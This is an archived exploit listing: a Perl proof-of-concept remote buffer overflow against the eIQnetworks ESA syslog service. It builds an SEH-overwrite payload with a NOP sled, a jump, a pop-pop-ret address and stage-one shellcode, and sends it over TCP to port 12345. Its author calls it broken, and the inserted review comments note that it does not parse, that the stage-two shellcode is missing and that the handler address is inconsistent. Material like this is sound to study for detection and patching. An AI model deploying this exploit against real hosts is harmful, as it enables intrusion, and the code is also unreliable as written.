eIQnetworks ESA - Syslog Server Remote Buffer Overflow

漏洞ID 1055832 漏洞类型
发布时间 2006-07-27 更新时间 2006-07-27
漏洞平台 Windows CVSS评分 N/A
#!/usr/bin/perl -w
# http://www.digitalmunition.com
# written by kf (kf_lists[at]digitalmunition[dot]com) - 03/23/2006
# Bug found by KF of digitalmunition.com.
# http://www.zerodayinitiative.com/advisories/ZDI-06-023.html
# Exploit for * Syslog Server by eiQnetworks  (OEM for Several vendors)
# There MUST be a syslog service listening on port 12345 for this to work. The syslog service is not enabled by default
# Currently borked... This shit overwrites the SEH on XP SP1. It just needs good shellcode. perhaps a reverse style jmp instead of a 
# forward jump. This would eliminate the need for 2 stages of shellcode. .  
#SEH chain of thread 00000FF4
#Address    SE handler
#013ECEF8   FWASyslo.00449EDB
#013EFF78   WS2HELP.71AA15CF   <-------- I set this address. 
#013EFF74   90909090
#013EFF78   909032EB  Pointer to next SEH record  <--- I set this. 
#013EFF7C   71AA15CF  SE handler   <--- pop pop ret 
#013EFF80   90909090
#71AA15CF   5F               POP EDI
#71AA15D0   5D               POP EBP
#71AA15D1   C2 0800          RETN 8
# View the SEH Chain and set a break on the address of the JMP code. This will let you debug the stage one shellcode.
use IO::Socket;

# NOTE(review): apart from the -w switch on the shebang line there is no
# `use strict; use warnings;`, so every variable below is an undeclared
# package global.

$bufsize = 4096; # total bytes written to the socket; the $buf layout pads to exactly this

$hostname = "";
$nextserec = pack("l", (0xEB069090)); # jmp short +0x06
$sehandler = pack("V", (0x71abe325)); # pop edi, pop ebp, retn - ws2help.dll  (Send this reversed note the 'V')
# NOTE(review): the SEH trace in the file header shows a different handler
# address (71AA15CF) than the constant above; the listing is internally
# inconsistent on this point.

# Binary hunts performed by JxT and Titon
# Target table entry: "<binary name>:<bytes from message start to the SEH record>".
$tgts{"0"} = "G2SRv4.0.36.exe:932"; # Use length to SEH overwrite. 

# Usage check. The comma operator discards the result of the list assignment,
# so the condition is simply the truth of $hostname (undef when fewer than two
# arguments were given).
# NOTE(review): neither this block nor the foreach inside it is ever closed in
# the posted listing, so the script does not parse as-is; everything that
# follows is syntactically part of this block.
unless (($target,$hostname) = @ARGV,$hostname) {

        print "\n        Syslog by eiQnetworks exploit, kf \(kf_lists[at]digitalmunition[dot]com\) - 03/23/2006\n";
        print "\n\nUsage: $0 <target> <host>\n\nTargets:\n\n";

        foreach $key (sort(keys %tgts)) {
                # NOTE(review): $a and $b are Perl's sort() package variables;
                # reusing them as scratch variables here and below is fragile.
                ($a,$b) = split(/\:/,$tgts{"$key"});
                print "\t$key . $a\n";

        print "\n";
        exit 1;

# $a = binary name, $b = offset to the SEH record for the chosen target.
($a,$b) = split(/\:/,$tgts{"$target"});
print "*** Target: $a, Len: $b\n";

# Stage 2 shellcode can be up to Length of SEH overwrite. 
# NOTE(review): no value follows this `=`; the statement continues across the
# comment lines to the `$sc1 = "..."` assignment below, so $sc2 receives the
# same 12-byte string as $sc1. The 344-byte payload described in the next
# comment is not present in the listing.
$sc2 = 
# win32_bind -  EXITFUNC=seh LPORT=4444 
# Size=344 Encoder=PexFnstenvSub http://metasploit.com

# Stage 1 shellcode can only be 128 bytes. 
# 12 byte Nop find code by skylined?  This is bullshit right now... it does not hunt for the right shit. 
$sc1 = "\x5f\x54\x90\xb8\x90\x90\xfc\x90\xaf\xf2\xc3\x57";

# for XP SP1  
#  <nops> <stage 2 shellcode><jmp code> <pop pop ret> <nops> <128 byte or less stage 1 shellcode> 

# Should total 4096
# Length check: ($b - len $sc2) + len $sc2 = $b; + 4 + 4 = $b + 8; + 128;
# + ($bufsize - $b - 8 - 128) = $bufsize. The trailing filler is 0x58, not 0x90.
# Defensive note: on the wire this is a single 4096-byte TCP message to the
# syslog listener consisting mostly of 0x90 and 0x58 filler -- an easy
# length/byte-run signature for IDS or for log review of that service.
$buf = "\x90" x ($b - length($sc2)) . $sc2 . $nextserec  . $sehandler . "\x90" x (128 - length($sc1)) . $sc1 . "\x58" x ($bufsize-$b-8-128);  

print "Exploiting $hostname\n";

# One TCP connection to the service's listener on 12345/tcp (per the header,
# that listener is not enabled by default); the whole message is one write.
$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$hostname, PeerPort=>12345, Type=>SOCK_STREAM);

$sock or die "no socket :$!\n"; 

print $sock "$buf";
close $sock;

# milw0rm.com [2006-07-27]